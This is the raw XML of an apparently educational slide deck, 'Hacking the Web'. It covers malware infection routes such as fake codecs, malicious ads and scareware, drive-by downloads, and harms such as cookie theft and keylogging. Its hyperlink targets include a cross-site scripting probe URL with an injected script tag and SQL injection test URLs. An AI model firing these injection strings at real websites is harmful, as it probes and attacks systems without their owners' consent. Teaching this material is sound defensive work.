Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://123greetings.com/view/AD30725122118909"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ww.gnucitizen.org/blog/google-gmail-e-mail-hijack-techniqu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example.com/test_form.php/%22%3ECscript%3Ealert(&#8216;hacked&#8217;)%3C/script%3E" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/test_form.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hitehatsec.market2lead.com/go/whitehatsec/WPstats1208"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mozilla.org/security/announce/2008/mfsa2008-36.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IFrame" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Cs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tinyurl.com/amgzs6"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beerpla.net/2009/02/12/how-to-fight-clickjacking-using-the-recent-twitter-hijacking-as-an-example/"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xample/article.asp?ID=2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example/article.asp?ID=2+and+1=1" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example/article.asp?ID=2+and+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west-wind.com/Weblog/posts/107136.asp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www.imdb.com/title/tt5446858/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/Stuxnet"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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wired.com/threatlevel/2012/10/dkim-vulnerability-widespread/"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reuters.com/article/2012/06/06/linkedin-breach-idINL1E8H6CBC20120606" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bits.blogs.nytimes.com/2012/07/12/yahoo-breach-extends-beyond-yahoo-to-gmail-hotmail-aol-user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business.time.com/2014/01/20/russian-teen-suspected-as-author-of-target-hacking-code/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://krebsonsecurity.com/2013/12/sources-target-investigating-data-breach/"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online.wsj.com/news/articles/SB10001424052702303873604579495362672447986" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://heartbleed.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://filippo.io/Heartbleed/"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blogs.adobe.com/conversations/2013/10/important-customer-security-announcement.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.zdnet.com/find-out-if-your-data-was-leaked-in-the-adobe-hack-7000023065/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cbsnews.com/news/apple-patches-icloud-security-gap-after-celebrity-photo-hacks-reports-say/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.apple.com/pr/library/2014/09/02Apple-Media-Advisory.html"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money.cnn.com/2015/11/10/technology/jpmorgan-hack-charges/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wired.com/2015/11/four-indicted-in-massive-jp-morgan-chase-hack/"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eff.org/nsa-spying/how-it-works" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.theguardian.com/world/the-nsa-fi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digitalattackmap.com/understanding-ddos/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cbsnews.com/news/internet-disrupted-dyn-hit-by-ddos-cyberattack/" TargetMode="Externa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hyperlink" Target="https://github.com/newsapps/beeswithmachinegu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namb.la/popular/tech.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyberinsecure.com/easter-related-search-engine-results-poisoned-redirect-users-to-malicious-application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219200" y="3810000"/>
            <a:ext cx="6858000" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Hacking the Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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990B5F3-CE6A-4530-9DA0-2CBC08FAF6E1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9222" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="6172200"/>
            <a:ext cx="3429000" cy="54927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tLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>How  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>poor Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> gets infected?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2253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58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EF91F59-9D32-4779-BB65-819CE051D9C1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Poor Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> can get the malware planted by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> in many ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>By installing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fake codecs</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 embedded with Trojans. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>zlob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>By viewing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malicious advertisements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0">
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Flash Banner ads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> as seen in 2008. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>By installing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fake scanners</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 or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misleading applications</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 (also called scareware/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>rogueware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example: Some malware trick users into believing that their computer is infected and urges them to install software like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Antivirus 2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> which itself is a malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>By visiting malicious P2P sites and downloading malicious content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>By visiting websites sent as email links by the hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This is also a form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>social engineering attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>By visiting links posted on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Blog Sites</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 under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Blog Comments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1500" dirty="0">
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Blog Spam is very common and many unsuspecting fall prey to links posted by malicious individuals posing as honest opinionates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>By installing pirated software from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>warez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> sites which are maliciously modified by hackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="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sz="2900">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Drive-by download .. The automatic infection vector of 2008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2355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68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26F7FD-9D5A-4F80-8449-3D502257F446}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3686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50888" y="1295400"/>
            <a:ext cx="7642225" cy="4860925"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="2276476"/>
            <a:ext cx="1126913" cy="1152524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent5">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36870" name="Picture 8" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j0195384.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73625"/>
            <a:ext cx="12223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cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>What damage can Joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s hacks cause?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2458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78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D7E2FD5-C0AB-434A-853B-49339B70C8F9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37892" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>On the client machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Stealing users cookies and thus gaining access to users accounts on websites like email/banking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Logging users keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Showing defaced/altered websites to the user (phishing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>User credential stealing and misuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
